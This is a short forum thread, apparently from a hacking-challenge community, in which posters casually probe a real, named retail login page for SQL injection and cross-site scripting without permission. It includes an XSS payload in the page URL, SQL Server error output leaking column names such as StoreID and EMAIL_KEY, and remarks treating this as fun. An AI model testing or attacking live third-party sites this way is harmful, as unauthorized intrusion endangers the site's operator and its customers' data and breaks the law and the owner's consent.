any one fancy some?(basic/just for fun)
was surching e bay for stuff and rembered i got a discount went to the discount pages and got redirected entered a simple sql injection and got
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/_ourLounge/processlogin.asp, line 7
the full url was
http://www.ourlounge.co.uk/_ourLounge/login.asp?Error=Invalid%20username%20or%20password%20entered.
http://www.ourlounge.co.uk/_ourLounge/login.asp?Error=<script>alert(1);</script>
… Just a start, I know.
Edit: And I think I'll stop there… their site is obviously hurting for some input validation.
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'v.StoreID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/_ourLounge/processlogin.asp, line 7
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'v.EMAIL_KEY' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/_ourLounge/processlogin.asp, line 7
strikes a rather familiar cord with one of the challenges doesnt it =P what a bunch of wangs ill leave it at that seeing as i have no real intrest in the site.